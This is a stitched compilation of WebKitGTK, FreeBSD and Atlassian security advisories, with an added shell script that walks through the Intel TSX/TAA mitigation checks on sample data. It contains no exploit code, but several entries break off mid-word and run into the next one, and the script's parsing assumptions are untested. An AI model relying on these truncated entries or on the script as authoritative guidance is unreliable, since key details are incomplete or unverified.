WebKitGTK and WPE WebKit Security Advisory WSA-2020-0002
Date reported : February 14, 2020
Advisory ID : WSA-2020-0002
WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2020-0002.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2020-0002.html
CVE identifiers : CVE-2020-3862, CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868.

Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.

CVE-2020-3862
Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4.
Credit to Srikanth Gatta of Google Chrome.
Impact: A malicious website may be able to cause a denial of service.
Description: A denial of service issue was addressed with improved memory handling.

CVE-2020-3864
Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4.
Credit to Ryan Pickren (ryanpickren.com).
Impact: A DOM object context may not have had a unique security origin.
Description: A logic issue was addressed with improved validation.

CVE-2020-3865
Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4.
Credit to Ryan Pickren (ryanpickren.com).
Impact: A top-level DOM object context may have incorrectly been considered secure.
Description: A logic issue was addressed with improved validation.

CVE-2020-3867
Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4.
Credit to an anonymous researcher.
Impact: Processing maliciously crafted web content may lead to universal cross site scripting.
Description: A logic issue was addressed with improved state management.

CVE-2020-3868
Versions affected: WebKitGTK before 2.26.4 and WPE WebKit before 2.26.4.
Credit to Marcin Towalski of Cisco Talos.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

We recommend updating to the latest stable versions of WebKitGTK and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases.

Further information about WebKitGTK and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/.

The WebKitGTK and WPE WebKit team,
February 14, 2020
FreeBSD Security Advisory FreeBSD-SA-20:02.ipsec
FreeBSD-SA-20:02.ipsec                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Missing IPsec anti-replay window check
Category:       core
Module:         kernel
Announced:      2020-01-28
Credits:        Jean-Francois HREN
Affects:        FreeBSD 12.0 only
Corrected:      2020-01-28 18:56:46 UTC (releng/12.0, 12.0-RELEASE-p13)
CVE Name:       CVE-2019-5613

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/.

I.   Background

IPsec is a suite of protocols providing data authentication, integrity, and confidentiality between two networked hosts.

II.  Problem Description

A missing check means that an attacker can reinject an old packet and it will be accepted and processed by the IPsec endpoint.

III. Impact

The impact depends on the higher-level protocols in use over IPsec. For example, an attacker who can capture and inject packets could cause an action that was intentionally performed once to be repeated.

IV.  Workaround

No workaround is available. Systems not using IPsec are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch
# fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch.asc
# gpg --verify ipsec.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
releng/12.0/                                                      r357218
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5613

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-20:02.ipsec.asc
FreeBSD Security Advisory FreeBSD-SA-20:01.libfetch
FreeBSD-SA-20:01.libfetch                                   Security Advisory
                                                          The FreeBSD Project

Topic:          libfetch buffer overflow
Category:       core
Module:         libfetch
Announced:      2020-01-28
Credits:        Duncan Overbruck
Affects:        All supported versions of FreeBSD.
Corrected:      2020-01-28 18:40:55 UTC (stable/12, 12.1-STABLE)
                2020-01-28 18:55:25 UTC (releng/12.1, 12.1-RELEASE-p2)
                2020-01-28 18:55:25 UTC (releng/12.0, 12.0-RELEASE-p13)
                2020-01-28 18:42:06 UTC (stable/11, 11.3-STABLE)
                2020-01-28 18:55:25 UTC (releng/11.3, 11.3-RELEASE-p6)
CVE Name:       CVE-2020-7450

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/.

I.   Background

libfetch(3) is a multi-protocol file transfer library included with FreeBSD and used by the fetch(1) command-line tool, pkg(8) package manager, and others.

II.  Problem Description

A programming error allows an attacker who can specify a URL with a username and/or password components to overflow libfetch(3) buffers.

III. Impact

An attacker in control of the URL to be fetched (possibly via HTTP redirect) may cause a heap buffer overflow, resulting in program misbehavior or malicious code execution.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch
# fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch.asc
# gpg --verify libfetch.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r357213
releng/12.1/                                                      r357217
releng/12.0/                                                      r357217
stable/11/                                                        r357214
releng/11.3/                                                      r357217
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7450

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-20:01.libfetch.asc
FreeBSD Security Advisory FreeBSD-SA-20:03.thrmisc
FreeBSD-SA-20:03.thrmisc                                    Security Advisory
                                                          The FreeBSD Project

Topic:          kernel stack data disclosure
Category:       core
Module:         kernel
Announced:      2020-01-28
Credits:        Ilja Van Sprundel
Affects:        All supported versions of FreeBSD.
Corrected:      2019-11-15 16:40:10 UTC (stable/12, 12.1-STABLE)
                2020-01-28 18:57:45 UTC (releng/12.1, 12.1-RELEASE-p2)
                2020-01-28 18:57:45 UTC (releng/12.0, 12.0-RELEASE-p13)
                2019-11-15 16:40:55 UTC (stable/11, 11.3-STABLE)
                2020-01-28 18:57:45 UTC (releng/11.3, 11.3-RELEASE-p6)
CVE Name:       CVE-2019-15875

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/.

I.   Background

The kernel can create a core dump file when a process crashes that contains process state, for debugging.

II.  Problem Description

Due to incorrect initialization of a stack data structure, up to 20 bytes of kernel data previously stored on the stack will be exposed to a crashing user process.

III. Impact

Sensitive kernel data may be disclosed.

IV.  Workaround

Core dumps may be disabled by setting the kern.coredump sysctl to 0. See sysctl(8) and sysctl.conf(5).

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch
# fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch.asc
# gpg --verify thrmisc.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r354734
releng/12.1/                                                      r357219
releng/12.0/                                                      r357219
stable/11/                                                        r354735
releng/11.3/                                                      r357219
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15875

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-20:03.thrmisc.asc
WebKitGTK and WPE WebKit Security Advisory WSA-2020-0001
Date reported : January 23, 2020
Advisory ID : WSA-2020-0001
WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2020-0001.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2020-0001.html
CVE identifiers : CVE-2019-8835, CVE-2019-8844, CVE-2019-8846.

Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.

CVE-2019-8835
Versions affected: WebKitGTK before 2.26.3 and WPE WebKit before 2.26.3.
Credit to Anonymous working with Trend Micro's Zero Day Initiative, Mike Zhang of Pangu Team.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8844
Versions affected: WebKitGTK before 2.26.3 and WPE WebKit before 2.26.3.
Credit to William Bowling (@wcbowling).
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8846
Versions affected: WebKitGTK before 2.26.3 and WPE WebKit before 2.26.3.
Credit to Marcin Towalski of Cisco Talos.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: A use after free issue was addressed with improved memory management.

We recommend updating to the latest stable versions of WebKitGTK and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases.

Further information about WebKitGTK and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/.

The WebKitGTK and WPE WebKit team,
January 23, 2020
Confluence Server and Data Center Security Advisory - 2019-12-18 - CVE-2019-15006
This email refers to the advisory found at https://confluence.atlassian.com/doc/confluence-security-advisory-2019-12-18-982324349.html .

CVE ID:

* CVE-2019-15006.

Product: Confluence Server and Data Center.

Affected Confluence Server and Data Center product versions:

6.11.0 <= version < 6.13.10
6.12.0 <= version < 6.13.10
6.13.0 <= version < 6.13.10
6.14.0 <= version < 6.15.10
6.15.0 <= version < 6.15.10
7.0.1 <= version < 7.0.5
7.1.0 <= version < 7.1.2
version < 7.2.0

Fixed Confluence Server and Data Center product versions:

* for 6.11.x, Confluence Server and Data Center 6.13.10 has been released with a fix for this issue.
* for 6.12.x, Confluence Server and Data Center 6.13.10 has been released with a fix for this issue.
* for 6.13.x, Confluence Server and Data Center 6.13.10 has been released with a fix for this issue.
* for 6.14.x, Confluence Server and Data Center 6.15.10 has been released with a fix for this issue.
* for 6.15.x, Confluence Server and Data Center 6.15.10 has been released with a fix for this issue.
* for 7.0.x, Confluence Server and Data Center 7.0.5 has been released with a fix for this issue.
* for 7.1.x, Confluence Server and Data Center 7.1.2 has been released with a fix for this issue.
* for 7.2.x, Confluence Server and Data Center 7.2.0 has been released with a fix for this issue.

Summary:

This advisory discloses a medium severity security vulnerability. Versions of Confluence Server and Data Center are affected by this vulnerability.

Customers who have upgraded Confluence Server and Data Center to version 6.13.10 or 6.15.10 or 7.0.5 or 7.1.2 or 7.2.0 are not affected.

Customers who have downloaded and installed any of the following versions should upgrade their Confluence Server and Data Center installations immediately to fix this vulnerability:

* Confluence Server and Data Center >= 6.11.0 but less than 6.13.10 (the fixed version for 6.11.x)
* Confluence Server and Data Center >= 6.12.0 but less than 6.13.10 (the fixed version for 6.12.x)
* Confluence Server and Data Center >= 6.13.0 but less than 6.13.10 (the fixed version for 6.13.x)
* Confluence Server and Data Center >= 6.14.0 but less than 6.15.10 (the fixed version for 6.14.x)
* Confluence Server and Data Center >= 6.15.0 but less than 6.15.10 (the fixed version for 6.15.x)
* Confluence Server and Data Center >= 7.0.1 but less than 7.0.5 (the fixed version for 7.0.x)
* Confluence Server and Data Center >= 7.1.0 but less than 7.1.2 (the fixed version for 7.1.x)
* Confluence Server and Data Center less than 7.2.0 (the fixed version for 7.2.x)

Atlassian Companion Man-in-the-Middle - CVE-2019-15006

Severity:

Atlassian rates the severity level of this vulnerability as medium, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment.

Description:

There was a man-in-the-middle (MITM) vulnerability present in the Confluence Previews plugin in Confluence Server and Confluence Data Center. This plugin was used to facilitate communication with the Atlassian Companion application.

The Confluence Previews plugin in Confluence Server and Confluence Data Center communicated with the Companion application via the atlassian-domain-for-localhost-connections-only.com domain name, the DNS A record of which points at 127.0.0.1. Additionally, a signed certificate for the domain was publicly distributed with the Companion application. An attacker in the position to control DNS resolution of their victim could carry out a man-in-the-middle (MITM) attack between Confluence Server (or Confluence Data Center) and the atlassian-domain-for-localhost-connections-only.com domain intended to be used with the Companion application. This certificate has been revoked, however, usage of the atlassian-domain-for-localhost-connections-only.com domain name was still present in Confluence Server and Confluence Data Center. An attacker could perform the described attack by denying their victim access to certificate revocation information, and carry out a man-in-the-middle (MITM) attack to observe files being edited using the Companion application and/or modify them, and access some limited user information.

Versions of Confluence Server and Data Center from version 6.11.0 before 6.13.10 (the fixed version for 6.13.x), from version 6.14.0 before 6.15.10 (the fixed version for 6.15.x), from version 7.0.1 before 7.0.5 (the fixed version for 7.0.x), from version 7.1.0 before 7.1.2 (the fixed version for 7.1.x), and from version 7.2.0-bet
FreeBSD Security Advisory FreeBSD-SA-19:25.mcepsc
FreeBSD-SA-19:25.mcepsc                                     Security Advisory
                                                          The FreeBSD Project

Topic:          Machine Check Exception on Page Size Change
Category:       core
Module:         kernel
Announced:      2019-11-12
Credits:        Intel
Affects:        All supported versions of FreeBSD.
Corrected:      2019-11-12 18:03:26 UTC (stable/12, 12.1-STABLE)
                2019-11-12 18:13:04 UTC (releng/12.1, 12.1-RELEASE-p1)
                2019-11-12 18:13:04 UTC (releng/12.0, 12.0-RELEASE-p12)
                2019-11-12 18:04:28 UTC (stable/11, 11.3-STABLE)
                2019-11-12 18:13:04 UTC (releng/11.3, 11.3-RELEASE-p5)
CVE Name:       CVE-2018-12207

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/.

I.   Background

The Intel machine check architecture is a mechanism to detect and report hardware errors, such as system bus errors, ECC errors, parity errors, and others. This allows the processor to signal the detection of a machine check error to the operating system.

II.  Problem Description

Intel discovered a previously published erratum on some Intel platforms can be exploited by malicious software to potentially cause a denial of service by triggering a machine check that will crash or hang the system.

III. Impact

Malicious guest operating systems may be able to crash the host.

IV.  Workaround

No workaround is available. Systems not running untrusted guest virtual machines are not impacted.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 12.1]
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch.asc
# gpg --verify mcepsc.12.1.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch.asc
# gpg --verify mcepsc.12.0.patch.asc

[FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch.asc
# gpg --verify mcepsc.11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r354650
releng/12.1/                                                      r354653
releng/12.0/                                                      r354653
stable/11/                                                        r354651
releng/11.3/                                                      r354653
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://software.intel.com/security-software-guidance/software-guidance/machine-check-error-avoidance-page-size-change
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12207

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:25.mcepsc.asc
FreeBSD Security Advisory FreeBSD-SA-19:26.mcu
FreeBSD-SA-19:26.mcu                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Intel CPU Microcode Update
Category:       3rd party
Module:         Intel CPU microcode
Announced:      2019-11-12
Credits:        Intel
Affects:        All supported versions of FreeBSD running on certain Intel CPUs.
CVE Name:       CVE-2019-11135, CVE-2019-11139, CVE-2018-12126,
                CVE-2018-12127, CVE-2018-12130, CVE-2018-11091,
                CVE-2017-5715

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/.

I.   Background

From time to time Intel releases new CPU microcode to address functional issues and security vulnerabilities. Such a release is also known as a Micro Code Update (MCU), and is a component of a broader Intel Platform Update (IPU).

FreeBSD distributes CPU microcode via the devcpu-data port and package.

II.  Problem Description

Starting with version 1.26, the devcpu-data port/package includes updates and mitigations for the following technical and security advisories (depending on CPU model).

Intel TSX Updates (TAA)                 CVE-2019-11135
Voltage Modulation Vulnerability        CVE-2019-11139
MD_CLEAR Operations                     CVE-2018-12126 CVE-2018-12127
                                        CVE-2018-12130 CVE-2018-11091
TA Indirect Sharing                     CVE-2017-5715
EGETKEY                                 CVE-2018-12126 CVE-2018-12127
                                        CVE-2018-12130 CVE-2018-11091
JCC                                     SKX102 Erratum

Updated microcode includes mitigations for CPU issues, but may also cause a performance regression due to the JCC erratum mitigation. Please visit http://www.intel.com/benchmarks for further information.

Please visit http://www.intel.com/security for detailed information on these advisories as well as a list of CPUs that are affected.

III. Impact

Operating a CPU without the latest microcode may result in erratic or unpredictable behavior, including system crashes and lock ups.

Certain issues listed in this advisory may result in the leakage of privileged system information to unprivileged users. Please refer to the security advisories listed above for detailed information.

IV.  Workaround

To determine if TSX is present in your system, run the following:

1. kldload cpuctl
2. cpucontrol -i 7 /dev/cpuctl0

If bits 4 (0x10) and 11 (0x800) are set in the second response word (EBX), TSX is present.

In the absence of updated microcode, TAA can be mitigated by enabling the MDS mitigation:

3. sysctl hw.mds_disable=1

Systems must be running FreeBSD 11.3, FreeBSD 12.1, or later for this to work.

*IMPORTANT* If your use case can tolerate leaving the CPU issues unmitigated and cannot tolerate a performance regression, ensure that the devcpu-data package is not installed or is locked at 1.25 or earlier.

# pkg delete devcpu-data
or
# pkg lock devcpu-data

Later versions of the LLVM and GCC compilers will include changes that partially relieve the performance impact.

V.   Solution

Install the latest Intel Microcode Update via the devcpu-data port/package, version 1.26 or later.

Updated microcode adds the ability to disable TSX. With updated microcode the issue can still be mitigated by enabling the MDS mitigation as described in the workaround section, or by disabling TSX instead:

1. kldload cpuctl
2. cpucontrol -i 7 /dev/cpuctl0

If bit 29 (0x2000) is set in the fourth response word (EDX), then the 0x10a MSR is present.

3. cpucontrol -m 0x10a /dev/cpuctl0

If bit 8 (0x100) of the response word is set, your CPU is not vulnerable to TAA and no further action is required.

If bit 7 (0x80) is cleared, then your CPU does not have updated microcode that facilitates TSX to be disabled. The only remedy available is to enable the MDS mitigation, as documented above.

4. cpucontrol -m 0x122=3 /dev/cpuctl0

Repeat step 4 for each numbered CPU that is present.

A future kernel change to FreeBSD will provide automatic detection and mitigation for TAA.

LLVM 9.0 will be updated in FreeBSD 13-current to address the JCC performance impact. Updates to prior versions of LLVM are currently being evaluated.

VI.  Correction details

There are currently no changes in FreeBSD to address this issue.

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11139
https://cve.
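The TSX/TAA decision procedure from sections IV and V of FreeBSD-SA-19:26.mcu, as an added example script that is not part of the advisory: it parses the two cpucontrol(8) lines, applies the bit tests the advisory lists, and reports which mitigation applies. The cpucontrol output layouts it parses (EAX..EDX after "cpuid level 0x7:", high then low 32-bit word after "MSR 0x10a:") are assumptions to verify against your own system, and the sample lines are constructed, not captured from a real machine.

```shell
#!/bin/sh
# TAA mitigation decision logic from FreeBSD-SA-19:26.mcu (added example).
# ASSUMED cpucontrol(8) output formats, check them on your own host:
#   cpucontrol -i 7 /dev/cpuctl0     -> "cpuid level 0x7: 0xEAX 0xEBX 0xECX 0xEDX"
#   cpucontrol -m 0x10a /dev/cpuctl0 -> "MSR 0x10a: 0xHIGH32 0xLOW32"

# True when bit $2 of the 32-bit hex word $1 is set (masks are derived
# from the bit numbers the advisory gives, e.g. bit 11 -> 0x800).
bit_set() {
    [ "$(( $1 & (1 << $2) ))" -ne 0 ]
}

# Print the $2-th (1-based) whitespace-separated word after the "label:" prefix.
word() {
    printf '%s\n' "$1" | sed 's/^[^:]*:[[:space:]]*//' | awk -v n="$2" '{ print $n }'
}

# Decide what the advisory says to do for the given cpucontrol lines.
# Prints exactly one of: no-tsx not-vulnerable mds-mitigation disable-tsx
taa_action() {
    cpuid7=$1; msr10a=$2
    ebx=$(word "$cpuid7" 2)      # second response word
    edx=$(word "$cpuid7" 4)      # fourth response word
    # Section IV: HLE (bit 4) and RTM (bit 11) set in EBX mean TSX is present.
    if ! bit_set "$ebx" 4 || ! bit_set "$ebx" 11; then
        echo no-tsx; return 0
    fi
    # Section V: EDX bit 29 advertises the IA32_ARCH_CAPABILITIES MSR (0x10a).
    # Without it there is no TSX_CTRL to query, so only the MDS mitigation applies.
    if ! bit_set "$edx" 29; then
        echo mds-mitigation; return 0
    fi
    low=$(word "$msr10a" 2)      # low 32 bits of MSR 0x10a
    if bit_set "$low" 8; then    # TAA_NO: CPU not vulnerable to TAA
        echo not-vulnerable; return 0
    fi
    if ! bit_set "$low" 7; then  # no TSX_CTRL: microcode too old to disable TSX
        echo mds-mitigation; return 0
    fi
    echo disable-tsx             # write MSR 0x122=3 on every /dev/cpuctlN
}

# Print (do not run) the commands the chosen action needs.
# $1 = action, $2 = number of CPUs (each /dev/cpuctlN needs its own MSR write).
mitigation_commands() {
    case $1 in
        mds-mitigation) echo 'sysctl hw.mds_disable=1' ;;
        disable-tsx)
            i=0
            while [ "$i" -lt "$2" ]; do
                echo "cpucontrol -m 0x122=3 /dev/cpuctl$i"
                i=$((i + 1))
            done ;;
        *) echo '# nothing to do' ;;
    esac
}

# Constructed sample outputs: TSX present, MSR 0x10a present, TSX_CTRL
# available (bit 7), TAA_NO clear (bit 8) -> the advisory's "disable TSX" path.
SAMPLE_CPUID7='cpuid level 0x7: 0x00000000 0x029c6fbf 0x00000000 0xbc000400'
SAMPLE_MSR10A='MSR 0x10a: 0x00000000 0x0000008b'

# On a real FreeBSD host (as root) the lines would come from:
#   kldload cpuctl
#   taa_action "$(cpucontrol -i 7 /dev/cpuctl0)" "$(cpucontrol -m 0x10a /dev/cpuctl0)"
action=$(taa_action "$SAMPLE_CPUID7" "$SAMPLE_MSR10A")
echo "sample system: $action"
mitigation_commands "$action" 2
```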
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0006
Date reported : November 08, 2019
Advisory ID : WSA-2019-0006
WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2019-0006.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0006.html
CVE identifiers : CVE-2019-8710, CVE-2019-8743, CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811, CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823.

Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.

CVE-2019-8710
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
Credit to OSS-Fuzz.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8743
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
Credit to zhunki from Codesafe Team of Legendsec at Qi'anxin Group.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8764
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
Credit to Sergei Glazunov of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to universal cross site scripting.
Description: A logic issue was addressed with improved state management.

CVE-2019-8765
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before 2.24.3.
Credit to Samuel Groß of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8766
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
Credit to OSS-Fuzz.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8782
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
Credit to Cheolung Lee of LINE+ Security Team.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8783
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before 2.26.1.
Credit to Cheolung Lee of LINE+ Graylab Security Team.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8808
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before 2.26.0.
Credit to OSS-Fuzz.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8811
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before 2.26.1.
Credit to Soyeon Park of SSLab at Georgia Tech.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8812
Versions affected: WebKitGTK before 2.26.2 and WPE WebKit before 2.26.2.
Credit to an anonymous researcher.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8813
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before 2.26.1.
Credit to an anonymous researcher.
Impact: Processing maliciously crafted web content may lead to universal cross site scripting.
Description: A logic issue was addressed with improved state management.

CVE-2019-8814
Versions affected: WebKitGTK before 2.26.2 and WPE WebKit before 2.26.2.
Credit to Cheolung Lee of LINE+ Security Team.
Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
Description: Multiple memory corruption issues were addressed with imp
Jira Service Desk Server and Jira Service Desk Data Center Security Advisory - 2019-11-06 - CVE-2019-15003, CVE-2019-15004
This email refers to the advisory found at https://confluence.atlassian.com/jira/jira-service-desk-security-advisory-2019-11-06-979412717.html .

CVE ID:
* CVE-2019-15003
* CVE-2019-15004

Product: Jira Service Desk Server and Data Center.

Affected Jira Service Desk Server and Data Center product versions:
version < 3.9.17
3.10.0 <= version < 3.16.11
4.0.0 <= version < 4.2.6
4.3.0 <= version < 4.3.5
4.4.0 <= version < 4.4.3
4.5.0 <= version < 4.5.1

Fixed Jira Service Desk Server and Data Center product versions:
* for 3.9.x, Jira Service Desk Server and Data Center 3.9.17 has been released with a fix for this issue.
* for 3.16.x, Jira Service Desk Server and Data Center 3.16.11 has been released with a fix for this issue.
* for 4.2.x, Jira Service Desk Server and Data Center 4.2.6 has been released with a fix for this issue.
